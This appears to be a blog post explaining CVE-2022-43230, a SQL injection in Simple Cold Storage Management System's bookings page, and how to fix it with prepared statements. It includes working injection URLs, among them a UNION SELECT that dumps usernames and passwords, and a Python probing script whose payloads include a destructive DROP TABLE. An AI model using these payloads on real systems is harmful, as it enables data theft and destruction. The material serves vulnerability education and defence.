Security and data privacy are critical for any business, even more so for those handling inventory and logistics. The Simple Cold Storage Management System (Simple CSMS) v1. is a popular, open-source tool used by small to medium-sized businesses to manage cold storage bookings. But if you haven't patched it, your system could be wide open. This long-read breaks down a serious vulnerability — CVE-2022-43230 — that's super easy to exploit and can leak your entire database.
Let’s unpack what went wrong, how dangerous it really is, and how attackers can use it to compromise your inventory data.
What is CVE-2022-43230?
CVE-2022-43230 is the identifier for a SQL Injection vulnerability in Simple Cold Storage Management System v1.. The bug is in the file /admin/?page=bookings/view_details, specifically on the id parameter. By sending crafted data in the URL, attackers can make the backend execute their own SQL commands. This means reading, changing, or destroying data without needing to log in.
Why Does This Happen?
It’s a classic security mistake: user inputs aren't filtered or escaped before being tacked onto SQL queries. So, the server trusts whatever it receives. That’s an open door for hackers.
Here’s a classic, simple piece of (unsafe) PHP code you might see
<?php
// ... connect to database
$id = $_GET['id'];
$sql = "SELECT * FROM bookings WHERE id = $id";
$result = mysqli_query($conn, $sql);
// ... rest of code
?>
Notice there’s no validation, no quotes, nothing. If you send id=1, it works. But if you send some sneaky SQL — like id=1 OR 1=1, it will return *all* records.
Let’s say your admin’s URL looks like this
http://target-site/admin/?page=bookings/view_details&id=5
If you changed the id value to inject SQL
http://target-site/admin/?page=bookings/view_details&id=5%20OR%201=1
This changes the SQL query on the server to
SELECT * FROM bookings WHERE id = 5 OR 1=1
The OR 1=1 part always evaluates to true, so it returns all bookings or potentially dumps other sensitive data.
Try seeing if the error messages change, which is a good sign of SQL injection
http://target-site/admin/?page=bookings/view_details&id=5'
Or, to dump usernames and passwords (if the query isn't limited)
http://target-site/admin/?page=bookings/view_details&id=5 UNION SELECT 1, username, password, 4 FROM users--
Warning: Only test on systems you own or have permission to test. Hacking other people's systems is illegal.
Here’s a simple Python script to automate finding this flaw
import requests
url = 'http://target-site/admin/?page=bookings/view_details';
# standard, safe id
payloads = [
"1",
"1 OR 1=1",
"1' OR '1'='1",
"1; DROP TABLE users;", # Dangerous if it executes, for awareness only
]
for p in payloads:
full_url = f"{url}&id={p}"
r = requests.get(full_url)
print(f"[*] Tried {full_url} - Status: {r.status_code} - Body length: {len(r.text)}")
Sources and References
- NVD - CVE-2022-43230 Entry
- Exploit Database - EDB-ID 50994
- GitHub - Original CSMS Project (archived)
How To Fix CVE-2022-43230
The best fix is to never trust user input and always use prepared statements or parameterized queries. Here’s a safe version of the query:
<?php
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM bookings WHERE id = ?");
$stmt->bind_param("i", $id); // "i" means integer
$stmt->execute();
$result = $stmt->get_result();
?>
Or, at the very least, cast your input
$id = (int) $_GET['id'];
$sql = "SELECT * FROM bookings WHERE id = $id";
Final Thoughts
SQL Injection is an old bug, but it keeps coming back, especially in free or open-source business tools. If you’re using Simple Cold Storage Management System, check your version and patch it now.
Got this vulnerability in your stack? Avoid a data disaster: fix your code, change your passwords, and scan for other weak spots.
*This post is for education and defense only. If you’re an admin or developer, take it seriously and apply the patch. Hack responsibly and stay safe!*
Timeline
Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC